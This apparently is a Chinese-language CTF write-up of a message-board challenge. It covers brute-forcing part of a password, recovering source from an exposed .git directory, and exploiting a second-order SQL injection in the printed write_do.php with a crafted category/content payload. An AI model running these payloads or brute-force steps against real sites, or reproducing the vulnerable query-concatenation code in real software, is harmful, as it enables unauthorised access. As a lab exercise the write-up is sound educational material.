进入靶场
发现只有一个发帖功能,尝试发帖
提交后要去登录,但这里提示了账号密码,但密码后三位不知,可以尝试暴力破解
bp抓包
假设后三位是数字,设置payload
爆破成功,后三位为666
登录成功
但除了发帖没有其他有用信息,尝试工具扫描
发现.git
禁止访问
使用githacker恢复文件
//write_do.php
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
header("Location: ./login.php");
die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
$category = addslashes($_POST['category']);
$title = addslashes($_POST['title']);
$content = addslashes($_POST['content']);
$sql = "insert into board
set category = '$category',
title = '$title',
content = '$content'";
$result = mysql_query($sql);
header("Location: ./index.php");
break;
case 'comment':
$bo_id = addslashes($_POST['bo_id']);
$sql = "select category from board where id='$bo_id'";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
if($num>0){
$category = mysql_fetch_array($result)['category'];
$content = addslashes($_POST['content']);
$sql = "insert into comment
set category = '$category',
content = '$content',
bo_id = '$bo_id'";
$result = mysql_query($sql);
}
header("Location: ./comment.php?id=$bo_id");
break;
default:
header("Location: ./index.php");
}
}
else{
header("Location: ./index.php");
}
?>发现在发帖时传递留言板参数使用了addslashes函数
查询php官方
说明在参数中出现引号会在前面加入反斜线
提交帖子时为write
提交留言时为comment
分析代码,在提交帖子时入库,在提交留言时会出库,而mysql在入库时会丢弃反斜线,所以可以使用二次注入,且取的是category
所以在category处写入单引号,通过addslashes函数会加上反斜线,入库时mysql会去掉反斜线,最终category查询出来就没有反斜线
$bo_id = addslashes($_POST['bo_id']);
$sql = "select category from board where id='$bo_id'";最终的查询
$sql = "insert into comment
set category = '$category',
content = '$content',
bo_id = '$bo_id'";
$result = mysql_query($sql);category加上单引号逃出单引号的限制,bo_id为数字,所以只有在content上写我们要查询的内容
构造payload:
category=' ,content=user(),/*
content=*/#构造了一个content,需要将原来的content注释掉
结合到查询语句中
insert into comment
set category = ' ',content=user(),/*',
content = '*/#',
bo_id = '$bo_id'";由于最终显示的是content的内容,
成功注入
